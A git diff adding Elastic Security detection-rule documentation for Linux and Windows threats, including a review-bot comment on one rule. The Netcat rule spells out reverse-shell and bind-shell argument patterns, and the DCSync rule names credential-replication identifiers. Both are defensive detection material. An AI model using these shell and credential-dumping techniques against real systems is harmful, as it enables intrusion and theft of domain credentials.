@@ -0,0 +1,64 @@ +[[prebuilt-rule-8-10-5-file-deletion-via-shred]] +=== File Deletion via Shred + +Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and process.name:shred and +process.args:("-u" or "--remove" or "-z" or "--zero") and not process.parent.name:logrotate + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: File Deletion +** ID: T1070.004 +** Reference URL: https://attack.mitre.org/techniques/T1070/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-made-immutable-by-chattr.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-made-immutable-by-chattr.asciidoc new file mode 100644 index 0000000000..37a354daae --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-made-immutable-by-chattr.asciidoc 
@@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-file-made-immutable-by-chattr]] +=== File made Immutable by Chattr + +Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.). + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 33 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and user.name == "root" and + process.executable : "/usr/bin/chattr" and process.args : ("-*i*", "+*i*") and + not process.parent.executable: ("/lib/systemd/systemd", "/usr/local/uems_agent/bin/*", "/usr/lib/systemd/systemd") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Sub-technique: +** Name: Linux and Mac File and Directory Permissions Modification +** ID: T1222.002 +** Reference 
URL: https://attack.mitre.org/techniques/T1222/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory.asciidoc new file mode 100644 index 0000000000..15ec766988 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory.asciidoc 
@@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory]] +=== File Permission Modification in Writable Directory + +Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 206 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:process and event.type:start and +process.name:(chmod or chown or chattr or chgrp) and +process.working_directory:("/tmp" or "/var/tmp" or "/dev/shm") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat.asciidoc new file mode 100644 index 0000000000..53e0a37fc1 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat.asciidoc 
@@ -0,0 +1,133 @@ +[[prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat]] +=== File Transfer or Listener Established via Netcat + +A netcat process is engaging in network activity on a Linux host. Netcat is often used as a persistence mechanism by exporting a reverse shell or by serving a shell on a listening port. Netcat is also sometimes used for data exfiltration. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet +* https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf +* https://en.wikipedia.org/wiki/Netcat +* https://www.hackers-arise.com/hacking-fundamentals +* https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657/ +* https://levelup.gitconnected.com/ethical-hacking-part-15-netcat-nc-and-netcat-f6a8f7df43fd + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Netcat Network Activity + +Netcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system. + +A reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. 
It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing. + +A bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker. + +This rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection. + +#### Possible investigation steps + +- Examine the command line to identify if the command is suspicious. +- Extract and examine the target domain or IP address. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. + +### False positive analysis + +- Netcat is a dual-use tool that can be used for benign or malicious activity. It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Block the identified indicators of compromise (IoCs). +- Take actions to terminate processes and connections used by the attacker. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "linux" and event.type == "start" and + process.name:("nc","ncat","netcat","netcat.openbsd","netcat.traditional") and ( + /* bind shell to echo for command execution */ + (process.args:("-l","-p") and process.args:("-c","echo","$*")) + /* bind shell to specific port */ + or process.args:("-l","-p","-lp") + /* reverse shell to command-line interpreter used for command execution */ + or (process.args:("-e") and process.args:("/bin/bash","/bin/sh")) + /* file transfer via stdout */ + or process.args:(">","<") + /* file transfer via pipe */ + or (process.args:("|") and process.args:("nc","ncat")) + )] + [network where host.os.type == "linux" and (process.name == "nc" or process.name == "ncat" or process.name == "netcat" or + process.name == "netcat.openbsd" or process.name == "netcat.traditional")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: 
Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-first-time-seen-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-first-time-seen-driver-loaded.asciidoc new file mode 100644 index 0000000000..d959fe6a8c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-first-time-seen-driver-loaded.asciidoc 
@@ -0,0 +1,144 @@ +[[prebuilt-rule-8-10-5-first-time-seen-driver-loaded]] +=== First Time Seen Driver Loaded + +Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating First Time Seen Driver Loaded + +A driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability. + +Attackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware. 
+ +Read the complete research on "Stopping Vulnerable Driver Attacks" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks). + +This rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context: + - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field. + - Examine the digital signature of the driver, and check if it's valid. + - Examine the creation and modification timestamps of the file: + - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `"dll.Ext.relative_file_name_modify_time"` fields, with the values being seconds. + - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation. + - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes. + - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. 
+- Use Osquery to investigate the drivers loaded into the system. + - !{osquery{"label":"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \"Microsoft\" AND signed == \"1\")\n"}} + - !{osquery{"label":"Osquery - Retrieve All Unsigned Drivers with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \"0\"\n"}} +- Identify the driver's `Device Name` and `Service Name`. +- Check for alerts from the rules specified in the `Related Rules` section. + +### False positive analysis + +- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk. + +### Related Rules + +- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa +- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd +- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. 
(Note that this step may require you to boot the system into Safe Mode) +- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed. + - This can be done via PowerShell `Remove-Service` cmdlet. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Ensure that the Driver Signature Enforcement is enabled on the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:"driver" and host.os.type:windows and event.action:"load" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync.asciidoc new file mode 100644 index 0000000000..9fcbb6569a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync.asciidoc 
@@ -0,0 +1,134 @@ +[[prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync]] +=== FirstTime Seen Account Performing DCSync + +This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. + +*Rule type*: new_terms + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html +* https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing +* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml +* https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md +* https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync +* https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Privilege Escalation +* Use Case: Active Directory Monitoring +* Data Source: Active Directory +* Resources: Investigation Guide + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating FirstTime Seen Account Performing DCSync + +Active Directory replication is the process by which the 
changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data. + +Active Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object. + +Adversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys that are used legitimately for creating tickets, but also for forging tickets by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate. + +More details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync). + +This rule monitors for when a Windows Event ID 4662 (Operation was performed on an Active Directory object) with the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set) is seen in the environment for the first time in the last 15 days. 
+ +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account and system owners and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not. +- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones). + +### False positive analysis + +- Administrators may use custom accounts on Azure AD Connect; investigate if this is part of a new Azure AD account setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert. +- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. Investigate if this is part of a new product setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. 
+- If the entire domain or the `krbtgt` user was compromised: + - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user. +- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.action:"Directory Service Access" and event.code:"4662" and + winlog.event_data.Properties:(*DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or + *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or + *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and + not winlog.event_data.SubjectUserName:(*$ or MSOL_*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: DCSync +** ID: T1003.006 +** Reference URL: https://attack.mitre.org/techniques/T1003/006/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: 
https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon.asciidoc new file mode 100644 index 0000000000..dfa460d788 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon.asciidoc 
@@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon]] +=== Halfbaked Command and Control Beacon + +Halfbaked is a malware family used to establish persistence in a contested network. This rule detects a network activity algorithm leveraged by Halfbaked implant beacons for command and control. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html +* https://attack.mitre.org/software/S0151/ + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Command and Control +* Domain: Endpoint + +*Version*: 104 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Threat intel + +This activity has been observed in FIN7 campaigns. 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +(event.dataset: (network_traffic.tls OR network_traffic.http) OR + (event.category: (network OR network_traffic) AND network.protocol: http)) AND + network.transport:tcp AND url.full:/http:\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}\/cd/ AND + destination.port:(53 OR 80 OR 8080 OR 443) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-high-number-of-process-terminations.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-high-number-of-process-terminations.asciidoc new file mode 100644 index 0000000000..2109ad833e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-high-number-of-process-terminations.asciidoc 
@@ -0,0 +1,103 @@ +[[prebuilt-rule-8-10-5-high-number-of-process-terminations]] +=== High Number of Process Terminations + +This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period. + +*Rule type*: threshold + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating High Number of Process Terminations + +Attackers can kill processes for a variety of purposes. For example, they can kill process associated with business applications and databases to release the lock on files used by these applications so they may be encrypted,or stop security and backup solutions, etc. + +This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period. + +#### Possible investigation steps + +- Examine the entry point to the host and user in action via the Analyse View. + - Identify the session entry leader and session user. +- Examine the contents of session leading to the process termination(s) via the Session View. + - Examine the command execution pattern in the session, which may lead to suspricous activities. +- Examine the process killed during the malicious execution + - Identify imment threat to the system from the process killed. 
+ - Take necessary incident response actions to respawn necessary process. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Reimage the host operating system or restore it to the operational state. +- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and process.name:"pkill" and process.args:"-f" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ 
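Review bot: The "High Number of Process Terminations" description says it counts "process terminations via pkill", but the rule query only matches `process.name:"pkill" and process.args:"-f"` on `event.type:start`, so it counts pkill invocations that use `-f`, not terminations in general; either state the `-f` constraint in the description or drop it from the query. The investigation guide also carries several spelling and grammar slips that should be fixed before shipping: "kill process associated" (processes), "encrypted,or stop" (missing space), "suspricous" (suspicious), "imment" (imminent), and "Examine the process killed" is missing its terminal period.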
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hosts-file-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hosts-file-modified.asciidoc new file mode 100644 index 0000000000..488a4c6145 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hosts-file-modified.asciidoc 
